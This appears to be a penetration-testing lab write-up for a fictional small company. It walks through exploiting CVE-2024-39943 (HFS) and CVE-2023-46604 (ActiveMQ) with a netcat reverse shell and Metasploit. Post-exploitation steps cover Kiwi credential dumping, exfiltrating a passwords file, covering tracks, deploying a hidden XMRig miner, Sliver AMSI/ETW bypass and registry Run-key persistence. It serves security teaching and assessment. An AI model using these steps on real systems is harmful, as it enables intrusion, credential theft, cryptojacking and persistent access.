Introduction

During the COVID-19 pandemic, many organizations faced cybersecurity challenges as they quickly adapted to remote work environments. “Tech Skibidi Inc.“, a medium-sized IT support and software development company, encountered vulnerabilities due to rapid technology deployment and insufficient security measures. This project aims to assess and strengthen their security posture through penetration testing and real-world attack simulations.

Objectives

  • Identify vulnerabilities within the office network.
  • Simulate real-world cyberattacks to evaluate system resilience.
  • Provide actionable recommendations to mitigate risks and improve security.

Use Case: SME Office Network Penetration Testing

Business Overview

Tech Skibidi Inc. employs 50 staff members across its main office and remote locations. Their network includes desktops, laptops, smartphones, printers, routers, and switches, primarily relying on Windows servers with some Linux systems.

Penetration Testing Goals

The project simulates attacks to uncover weaknesses and demonstrate their impact through:

  • Network scanning and enumeration.
  • Vulnerability assessment.
  • Exploitation and post-exploitation activities.

Pen-Test Environment Setup

Network Diagram

The network is divided into virtual machines for the attacker and target environments:

  • Attacking Machine: Kali/Black Arch/Parrot Linux.
  • Linux Server: Ubuntu 24.04 LTS.
  • Windows Server: 2019 with Active Directory.

Virtual Network Interfaces Configuration

  • VMnet1: Host-only (192.168.1.0/24)
  • VMnet2: Host-only (192.168.2.0/24)
  • VMnet3: Host-only (192.168.3.0/24)

Each device is assigned a unique IP address and configured to ensure isolation and security.

Tasks and Highlights

Task 1: Network Scanning and Enumeration

  • Tools used: Nmap to identify live hosts, open ports, and services.
  • Results: Enumeration revealed several exploitable vulnerabilities.

Task 2: Vulnerability Assessment

  • Tools used: OpenVAS and Nessus to detect vulnerabilities.
  • Findings: Key exploits include CVE-2024-39943 (HFS) and CVE-2023-46604 (ActiveMQ).

Exploitation: Step-by-Step Process

Exploitation 1: Rejetto HFS Vulnerability (CVE-2024-39943)

Step 1: Scan the Target

  1. Run nmap to identify open ports on the target Ubuntu server:

    1
    nmap 192.168.1.129

  2. Confirm port 443 is open for HTTP File Server.

Step 2: Login to the HFS Web Interface

  1. Access the target HFS server at:
    1
    http://<Ubuntu IP>:443/
  2. Login using default credentials:
    • Username: guest
    • Password: guest

Step 3: Capture Session Cookies

  1. Open the browser’s Network Inspector and refresh the page.
  2. Copy the session cookies from the GET request headers.

Step 4: Exploit the Vulnerability

  1. Prepare a listening terminal on the attacker machine:
    1
    netcat -lvp 4444
  2. Use the hfs_vuln_script.py to exploit the server:
    1
    python ./hfs_vuln_script.py
  3. Provide the following details in the script:
    • URL: Target HFS server URL.
    • Cookies: Captured session cookies.
    • Attacker IP: Local IP of the attacking machine.
    • Port: Listening port (e.g., 4444).

Step 5: Verify Exploitation

  • Check the terminal for root access to the Ubuntu server.

Exploitation 2: ActiveMQ Hello Kitty Vulnerability (CVE-2023-46604)

Step 1: Setup the Target

  1. Install ActiveMQ Server on Windows Server 2019 (version 5.18.2).
  2. Start the server by running the .bat file.

Step 2: Prepare the Exploit

  1. On the Kali machine, download the exploit source code for CVE-2023-46604.
  2. Copy the payload to the Metasploit framework’s misc folder.

Step 3: Configure Metasploit

  1. Launch Metasploit:
    1
    msfconsole
  2. Reload all modules to include the new payload:
    1
    reload_all
  3. Search for the CVE payload:
    1
    search cve-2023-46604
  4. Select the payload and set required options:
    • RHOST: Target IP address.
    • LHOST: Attacker IP address.
    • SRVPORT: Local listening port.
    • FETCH_SRVPORT: Exploit port (different from SRVPORT).

Step 4: Execute the Exploit

  1. Launch the attack:
    1
    exploit
  2. Start a Meterpreter session with the victim machine.

Task 4: Post-Exploitation Activities

1. Data Exfiltration

  1. Use Meterpreter (Kiwi) to dump credentials:
    1
    2
    load kiwi
    creds_all
  2. Save the credentials to a text file:
    1
    download C:\\Users\\Public\\passwords.txt /home/kali/passwords.txt
  3. Clear tracks by deleting the text file from the victim machine:
    1
    rm C:\\Users\\Public\\passwords.txt

2. Silent Cryptocurrency Mining

  1. Upload the Silent-XMRig-Miner to the victim machine:
    1
    upload /home/kali/Downloads/SilentMiner.zip C:\\Desktop
  2. Execute the miner silently:
    1
    Start-Process -FilePath "C:\\Desktop\\SilentMiner\\xmrig.exe" -Verb RunAs

3. Sliver C2 Framework

  1. Inject processes and bypass AMSI:
    1
    2
    inject-etw-bypass <pid>
    inject-asmi-bypass <pid>
  2. Create persistence:
    1
    registry write -T binary --path /tmp/GREEN_OVERSHOOT.exe --hive HKCU "Software\\Microsoft\\Windows\\CurrentVersion\\Run" updater
  3. Capture screenshots:
    1
    screenshot

Summary

The penetration testing project successfully demonstrated the exploitation of critical vulnerabilities in Tech Skibidi Inc.’s network, including:

  • Remote code execution (CVE-2024-39943).
  • Privilege escalation and data exfiltration (CVE-2023-46604).
  • Covert cryptocurrency mining and persistent access.

Recommendations

  1. Patch outdated software (HFS, ActiveMQ).
  2. Enhance monitoring for unauthorized processes and file changes.
  3. Implement robust access controls and endpoint detection.

Citations